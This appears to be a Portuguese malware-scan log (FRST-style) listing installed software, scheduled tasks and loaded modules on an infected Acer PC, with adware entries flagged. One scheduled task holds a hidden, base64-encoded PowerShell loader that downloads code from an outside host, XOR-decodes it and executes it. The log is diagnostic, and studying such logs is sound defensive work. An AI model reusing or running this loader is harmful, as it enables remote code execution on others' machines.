Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3383 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.1.41 - Intel Corporation)
Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Jewel Quest Mysteries: The Seventh Gate Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden
McAfee LiveSafe – Internet Security (HKLM-x32\...\MSC) (Version: 14.0.4121 - McAfee, Inc.)
McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.170 - McAfee, Inc.)
Metric Collection SDK (x32 Version: 1.1.0012.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 4.0.50401.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Mozilla Firefox 41.0.1 (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 41.0.1 (x86 pt-BR)) (Version: 41.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.1.5750 - Mozilla)
Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden
PriceFountain (remove only) (HKU\.DEFAULT\...\PriceFountain) (Version: 1.2.9.6 - PBNGTBJJPYO) <==== ATENÇÃO
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.318 - Qualcomm Atheros Communications)
Qualcomm Atheros WLAN and Bluetooth Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 12.29 - Qualcomm Atheros)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.21257 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.88.617.2014 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7300 - Realtek Semiconductor Corp.)
Slingo Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.6.21 - Synaptics Incorporated)
Tales of Lagoona (x32 Version: 2.2.0.98 - WildTangent) Hidden
Torchlight (x32 Version: 2.2.0.98 - WildTangent) Hidden
Update for PriceFountain (HKU\.DEFAULT\...\Price Fountain) (Version: - Update for PriceFountain) <==== ATENÇÃO
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.97 - WildTangent) Hidden
Wedding Dash (x32 Version: 2.2.0.95 - WildTangent) Hidden
Welcome Center (HKLM-x32\...\Acer Welcome Center) (Version: 1.02.3507 - Acer Incorporated)
WinRAR 5.30 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: 6.7.141 - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== ATENÇÃO
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
==================== Exame Personalizado CLSID (Whitelisted): ==========================
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
==================== Tarefas Agendadas (Whitelisted) =============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
Task: {11C1BB2D-ABCF-47CB-87C2-632318010DEF} - System32\Tasks\Oelfiireaoiwi => C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe [2016-02-18] ()
Task: {43028A6D-616B-4C96-BA4F-5A69F0CFD4D1} - System32\Tasks\BacKGroundAgent => C:\Program Files (x86)\Acer\AOP Framework\BackgroundAgent.exe [2016-01-14] (Acer Incorporated)
Task: {4C42830B-AA07-45AE-A867-876E37385BF9} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {4E3185D6-79DE-4121-8AF5-6B6D8ACE7283} - System32\Tasks\{D9CD2D34-2181-47F9-BBA9-B91F0372C472} => pcalua.exe -a C:\Users\josejoao\Downloads\OUTROS\JavaSetup8u60.exe -d C:\Users\josejoao\Downloads\OUTROS
Task: {63177D68-4652-47F8-AB29-1670BD5DEB4C} - \MPC AdCleaner -> Nenhum Arquivo <==== ATENÇÃO
Task: {74FF969F-A1D4-437C-AF17-30B0E05C71E3} - System32\Tasks\Launch Manager => C:\Program Files\Acer\Acer Launch Manager\LMLauncher.exe [2014-06-09] (Acer Incorporate)
Task: {78FFF65C-587A-4616-81A1-11BF6DA8DE14} - System32\Tasks\AcerCloud => C:\Program Files (x86)\Acer\Acer Portal\AcerPortal.exe [2016-01-19] (Acer)
Task: {A45F5DDC-4436-445A-BBD4-7119E793F921} - System32\Tasks\PFExe => C:\Windows\system32\config\systemprofile\AppData\Local\PriceFountain\pricefountain.exe <==== ATENÇÃO
Task: {B293D63D-EF51-470F-B1CE-86546EE9552C} - System32\Tasks\UALU notificatin => C:\Program Files\Acer\Acer Updater\UALU.exe [2012-04-05] (Acer Incorporated)
Task: {BA0A6938-AF9A-469C-8BA4-0939AE1760AB} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-09-09] ()
Task: {BA5DF0BD-50A7-40A9-B22A-85D17771E212} - System32\Tasks\{4C6887B2-54D6-447E-8B85-C47FA426E573} => pcalua.exe -a C:\Users\josejoao\AppData\Roaming\uTorrent\uTorrent.exe -c /UNINSTALL
Task: {CE3BE677-6922-44E7-B039-FDC7D2592DD5} - System32\Tasks\{050C7D47-090B-090C-0D11-0D7E7E79117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAZQBhAHUAdAB5AGYAaQBsAGUALgBpAG4AZgBvAC8AdQAvAD8AYQA9AEEAOQBiAHkAWQB5AFYANwAzAFEATQBlAGcANgBwAG4AYwBFAFIAbwA1AHIAbQBUAGEAagBLAHcAdQBjAE8AMwBiAEoAdwBEAHMAcwBPAC0ASQBNAFAAeABsAHgAMwAzAHEAVABMAGMAOQBvADQALQBPAGoANAB4AGIAdgBEAHcANQBhAGsALQBMAHgAQQBxAHEATQBoAFYAZgBMAHAAcAB6AEYAWABvAHYANwBJAEsALQBZADEAQgBuAFoAbwB1AG8AQQBZAHoAbABpAFkALQAtAHAASgBrAGMAeQBSAGUAUABUAGcAQwBqAHYAMgBKADUASwBNAGoAVABGAEcASQBfADgARAB4AFcAWgBMAEYANQBoADYAMABLAGoAMwBZAFEAVgBYAHgARwBvAE0AeABUAFkASwBlADcAZABTAHEAbAB1AFIAcgBMAEgAdABQAHYAUQBoAEoAdAB4AFEASgBiADMAVABOADUAYQBRAHAATgB2AE8AMwBGAEsARQBmAFMAeQB5AFcAcABzAFoAMwB6AFcAQgBHAFEAMwBrAE8AcwBIAHUAMQBNAE8AUABrAHUAdgBuADQATgBlADQANAB4AE8AMgBjAG4AbAB5AHgAQQA4AHkASABOAFcASwAyAHoAZwBnAHEAZwA4AHoAaABwAF8ASwBwAG8AYgBVAE0AaQBkAEoAZABOADkAWgBTAGYAWAB1AGcAdQB0AGsAZQBmAEoAcwA3AG0AbgBJAEMAawBZAGcATQBfAGcATwAwAC0ASgBRAHUAcABkAGMAbwBwAHMAUgB0ADMAYgA2AFoAOQBWAEEAWQBQAFUAawBHAEoAcgBmAG0AaQB3AE0AbwBWAGcAXwB2AGoAdQBtAFMAOQAtADUARABEAC0AZABqAEgAcABTAGMAZgA0AFEAcABqAGkAXwB4AG8AMgBsAHIANQB5AGMAcABwAGwAVABmAG8ATABzAGgAOAB6AFUAcAA3AHcAMQBZAGoANABBAEgAcABqAF8ATgBfAHkAdgBIAHAAbwBWAHEAdABUAG4AWABsAHMASgAtAGUANAA3AEcAMwBvAHEAQgB1AEYAZwBZAEEAbgBOADcAVQBvAEMANQBJAEQAOQA1ADYALQB3AFAAdwBnAFAAdgBwAGUAZQBNAEIAbwBsAEgAcwBnAGYASABNAFAARQBqAEoAZwB3AGwAYwA3AF8AcwB2AFkANAAxAGoAYQBvADYASABHAEoAWQBCAGcAYgBaADIAcgB2AEIAMQA3AEcAZgBxADkAawA4AHUAeQBZAEIAdABrAFkAMAAtAFQAYwB2ADUAYwA2AE4AWQBzAFgAaQBWAEUAUgBZAHkAagBFAGYAbgAwAHQAOABFAFUANwBPAEwAMgBpADcASABDAFkAUAAwAHAAMABvADUAdgB5AEkAaAA4AGoAYgBYADYAZwBSAEMAcwAwAEYAUQBTADYAdABtADkAVABSAEoAMwA1AF8AcABsAG0AUQBBAEgAbQBoAEIAVQBxAEkARQBOAFkAZQBvAGkAbgBSAGQATgBmAHMAdgA1AEQAZwBPAE8AUQBnAFUAWABEADIAQgBNADYAaABJAF8AWQA3AFQAUwA0ADYAVwB0AGcALQBlADUASgBjADcARABYAHEAUABTAGgAcAB5AFAARAB1AGoAZwBWAEsASQBrAEIAVwB1AGcASwBGAGoAMgA2AHQAQwBaAGYASwBZAE0AaABuAFAAbQBNAFUAVwBLAEUAegBHADMASgA1AGIAdgBKADEAXwBqAEwAdgBuAHAAOQBrADMATwBtADQAZQA5AHYAeQAwAHoATABLAFQAMwBkAEwAZABEAFAARAB6AGEAbAAwAHgANwBOAFgAVABrAGUAUQA5ADgATQBEAE0AdwBWAFkAMQB2AHMAVgB1AEMATABKAFkAOQBXAGkASQAyAGkAcwA1AFQAYgBDAGsANgBlAHkAVgA4AG4ATAA0ADMAZAAzAHgAQwB0ADEASABfAGUAXwAxAFkAVwBxAHIATAAxAEYATQBUAHkATwAzAFoAQwBwAEoAMgAwAGMARwBkADEAcAAxAGEAZgBKAG0AZQA1AGQATgBaAHoAMwBUAEEAaQBQAEoAcQBlAE8ASQBLAFYAVgBLAHMASwBxAHEATQBRAFQAdwA4AHQAbQAtAEkAZABmADUAYwB5AE4AZwB5AHIAbwBxAEYAWgBpAHMAOABnAGMANgBqAEYALQBiADIAZQBqAFkAMwBPAFQAdgB4AEgANwB2AFkAdABQAHoAQQAzAGcAbwBVAEMAawBUAHMAZQBGAFMAOQBsAC0ARwBZAHYAYgAwAF8AcgBaAGgAWQB6AHIAVwBoAFoAYQBZAHgAZQA1AEMAYgBFAHUASQBJAEkARgAmAGMAPQByADkAVQBNADMAeABrAHEAegB1AF8AUQBTADEAdQBsADYANABRAFoAZgBuADIAQwBhAG0ATQBIAEwAagBlAHEANQBRAHQARQBhAGIAUgBDAFQAcgBiAE0AcgBxAGoAVQBBAE8ANwBWAEYAYwAtADYAMQBZAFQAegBkAGUAYQB2AGwAYQBWAHAAZABSAFAAegA3AHgASAA5AEIASwBlAGcAdABUAEEATwA0ADAAcQBMAHgAUABEAGsAagBlAE8AWgByAFQAQgBfAGoAYwBzAC0AagBLADEAUwBkAFQAdABhAGQAcwBTAEEAcQBPAHIAYgBxAHYAeQAyAEgAMQBTAEgANQByAHYAVQA1AFIAMgBXAFMAbABNAF8ALQBlAGIAbABCAGwAVAB4AGcAVQBKAHAAZQBCAG8AeABSAEMAbgBJAHUAagBmAFgANwBSAHEAUQBPAF8ARgBmAHMAVgB3ADEAMgBtAEwAVQBUAGEARwBNADIARQBiAC0AVwBTAFYAaQBNAGwAdwA3AHEAWQBVAGkAUwB1ADkASQB0AGsAYQBFAHkAagBWAEgARgBkAEcAXwBGAEEAVwBLAHkAcgBnADkAXwB2AEgASABuAEUAeQB4AEcAcAByAFIAeAB2ADgAMwBCAEYASgBCAFAAdQAwAFEANwBfAHUAZgA4AFoASAAwADkAUQB4AE8AOAAwAEsAVQB3AGgAegBaADYALQBqAC0AZQBhAEYAVgBxAGEANgBtAGUAYwBCAGIAUgBvADAAWQByAEUASwB5AFQAQgBJAG8ANABaADkAUgBPAGEAbgB4AGwAcgBVADIAMAAwAGsASABqADUAVgA4AGsATQBwADMAcwBNAC0ALQBMAHUAUwAwAEwAcABtAGgATwBrAEYAcwBqAC0ATABKAEsANQBrAEkAVgBLAHgAMgA5AEEATgBjAHMAbABRAGkAbwBiAEwAawBvAEUAMgBTAG4AcwBzAGQAcQBkAEcAcQA2AHYASwBsAHIAZwBNAFUAVwB6AHUAUABOAGoAQwByAFoAOABhAFUASgB0AE8AXwBVAEkAUgBwADMAbQBhAG0ANQBuAGUAZwBUAEYARwBkADMAaABxAGMAdgBQADYAdABzAGcAQwBhAHQAcQAyAGkATwBUAFEAZwA0AC0AYgBjAFEATAA0AHQAcgBjAGkAQQBFAGIATQBTAHgATABFAGcANwBkAHgATABVAGgAbgA1AE8ASAB2AEgAdAB4AHIAcQBoAEQAUQBqAFUAegBBAE8ARABvAHAAYgB3AFUATgBYAE8AZABXADcAUABjAFQATAB3AEcAeABlAGMARQA4AFUARABfAFIAeAB1AGIATQA0AHgATgBpADAAUwBVAFEAdwBlADkATwBfAFMAawBWAEMARQAtAFcAZABUAHUAbQBBADIAZgBwAEUAeABhAGQAZwB0ADcAbQBqAGoANABrAC0AcgBjAGcAQgBuAGkAWABMAC0ALQBKAFIASQA5AGkAbgBNADAAcABFAC0ASgBPADIAVgBwAHIARwBaAEgAaQBPAGYAdwA5AEsATQBoAHYAdwBHAGUARgBrAGEAdQBzADQAbwBIAGoAYwA2AEQASABhAF8AVgB2AGYATABQAGQATwA0AEgAMgBzAFgAVwB5ADIAawBNADAAMgAzAGEARgBNAEkAdAA3AE4AWgB6AFYAVwBoAEkAdABsAGMAagBxAGoASgBNAGkARAA4AEwARQB5AEIAcwBZADcAZQA1AGcATwAyAEcASgBSAFEAOAB1AGEARABDAEkAcwBRAGsAVABfAFAARgBsAFYARQBHADEAegBVAFAAdQAtAFQAVQBLAFMAYgBrAEMAdQBRADAAMgBtAGIAdwBCAGgAcABJAGcAYwBmAHUAbwBSAEQATwBLADgAWgBfAFUAeQBEAHgAZwBXAEkAagBfAHgAVQBGAC0AdQB5AGkAcQBLAHoAbgBDAEYAagBRAFoAbgBwAGcAcgA3AGEARQBFAFkAVABoAFIAaQBZAEwAYwBEAFYATABXAFMALQBYAHEATAAtAHMAOQBuAE8ASgBFAEEAZwBoAGkAUgBpAEgAVgBOAFcAZgA0AGEATQBjAFYATQBtAFQANwA4AFAAVgBNAEwAcgBiAFkAZQBaADYAYQBhAFkAdQAyAE8ARwA4AGgAOABPAHMAQQBaADAAawB2AHYAbAB1AGsAVwB4AG8AWAB4ADQARgBYAFIANAByAGcAQQAyAG8AbwA0ADYANwBwAFoAQgBFAGEAMQA1AFQATwBkAFIAQgBDAHMAMQA5AEYARQBzAGEAUwBBAEcAMABTAHUASgA1AFUARQBzAEUARAAyAHEAOABIAEoAcQBSAGYALQBSAEcAVwAwAGQAeQB2AHYAUwBPAFcAcABfADEAbQBFAFoAVgA5AHkAdABsAHIAagBnAFkAdQBlADQASABuACYAcgA9ADQAMwA2ADAAMQA5ADQANAAzADMANAA5ADUANgA3ADQANwA2ADkAIgA7ACQAcwB0AHMAawA9ACIAewAwADUAMABDADcARAA0ADcALQAwADkAMABCAC0AMAA5ADAAQwAtADAARAAxADEALQAwAEQANwBFADcARQA3ADkAMQAxADcAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFEAUABNAEYATwBMAFEARwAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {D8D9B90F-2779-4362-8EF0-8C65E3912461} - System32\Tasks\TYVBGGSEXDNVMURL => C:\ProgramData\Service7609\Service7609.exe [2016-01-27] () <==== ATENÇÃO
Task: {EE5807FB-BFAE-47D4-B609-39B858E49FAE} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-08] (Google Inc.)
Task: {F0E0E8AF-50E1-47F3-813A-BBA05071D7B2} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {F5EDFA31-2E38-43DA-AEE1-674D1151DA09} - System32\Tasks\Recovery Management\Burn Notification => C:\Program Files\Acer\Acer eRecovery Management\NotificationCenter\Notification.exe [2012-03-15] (Acer)
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\TYVBGGSEXDNVMURL.job => C:\ProgramData\Service7609\Service7609.exe <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
==================== Módulos Carregados (Whitelisted) ==============
2016-02-04 10:10 - 2016-02-04 10:11 - 00408576 _____ () c:\windows\mtkw.exe
2016-02-04 10:10 - 2016-02-04 10:10 - 00417792 _____ () c:\windows\tkw.exe
2010-01-30 03:40 - 2010-01-30 03:40 - 04254560 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2015-02-25 19:58 - 2014-01-03 15:13 - 00111872 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll
2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () c:\programdata\msiql.exe
2014-02-25 23:11 - 2014-02-25 23:11 - 00086016 _____ () C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\Modules\Map\MAP.dll
2016-01-30 15:50 - 2016-01-26 11:54 - 02415616 _____ () C:\ProgramData\msiql.exe
2015-02-25 19:50 - 2013-10-01 07:09 - 00078880 _____ () C:\Program Files\Realtek\Audio\HDA\FMAPP.exe
2015-10-24 11:12 - 2015-10-24 11:12 - 98422784 _____ () C:\Windows\SysWOW64\SYSJOSEJOAO-PC.exe
2016-02-18 09:31 - 2016-02-18 09:31 - 00689560 _____ () c:\windows\temp\32703\setup.exe
2016-02-18 09:31 - 2016-02-18 09:31 - 00157184 _____ () C:\ProgramData\Oelfiireaoiwi\1.0.7.1\uheohnik.exe
2016-02-11 11:33 - 2015-05-25 08:32 - 00068432 _____ () C:\Program Files (x86)\Elex-tech\YAC\zlib1.dll
2016-02-11 11:33 - 2015-08-06 01:51 - 00582144 _____ () C:\Program Files (x86)\Elex-tech\YAC\curlpp.dll
2016-02-11 11:34 - 2015-08-21 00:02 - 00176976 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unrar.dll
2016-02-11 11:34 - 2015-08-21 00:02 - 00087744 _____ () C:\Program Files (x86)\Elex-tech\YAC\tws\unacev2.dll
2016-02-11 12:14 - 2016-02-04 14:57 - 02010624 _____ () C:\ProgramData\WindowsMsg\675D131108D4FD145B0BFBC68A3E018A.dll
